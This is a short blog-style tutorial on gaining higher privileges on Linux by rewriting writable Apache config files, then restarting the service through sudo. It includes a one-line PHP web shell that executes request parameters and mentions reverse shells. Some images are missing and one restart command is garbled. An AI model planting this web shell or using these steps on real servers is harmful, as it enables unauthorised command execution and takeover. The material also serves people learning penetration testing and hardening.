Abusing Apache Misconfiguration - Privilege Escalation

Fri May 31, 2024

In this article, we’re going to talk about a technique for escalating privileges, where the initial vector comes from the misconfiguration of the widely known server, Apache!

A little introduction to Apache

It all started in 1995, when the Apache HTTP server project was created with the aim of creating and maintaining an open source HTTP server for modern operating systems, mainly UNIX and Windows. Maintaining efficiency, security and synchronization with current HTTP protocol standards.

“The Number One HTTP Server On The Internet” - Apache Official Website.

Overview

When installing the Apache server on your machine, ubuntu for example, you can locate the configuration files in /etc/apache2. The following images show an example of the files and directories created:

Config files!

How to check this vulnerability

If you have permissions to restart the apache server, either because of a misconfiguration or because you can run as root. The following code exemplifies a sudo -l for a user:

User www-data may run the following commands on machine:
    (ALL) NOPASSWD: /usr/sbin/service apache2 restart

The vulnerability in question is due to improper permission to write from apache.conf or envvars, as these files define which user will run apache.

The following image shows an incorrectly configured apache.conf file:

ls -la /etc/apache2/apache.conf

The following image shows an incorrectly configured envvars file:

ls -la /etc/apache2/envvars

Exploit - The best part

1 - Change the files

Depending on your operating scenario, you’ll need to make changes in different ways, so below you can see some of the ways you can change users.

In the apache.conf file, change the following user and group lines to the existing users on your machine, in the example user john:

In the envvars file, change the following variables for existing users on your machine, in the example user john:

2 - Create a maliciuos file

As an example, I created the following PHP code in the /var/www/html directory, called file.php:

<?php
    system($_REQUEST['cmd']);
?>

You can certainly create a file with a web shell or use a revese shell, like the one in pentest monkey.

3 - Restart the Apache Server

Before you finish, simply restart the Apache server to update the settings we have installed.

sudo /usr/bin/service restart apache2

4 - Go pwned

Access your file and happy ending:

Fonts

Apache HTTP Server Project. (2024, May 31). Apache Software Foundation. http://httpd.apache.org/
Apache configuration privilege escalation. (2024, May 31). Exploit Notes. https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/apache-conf-privilege-escalation/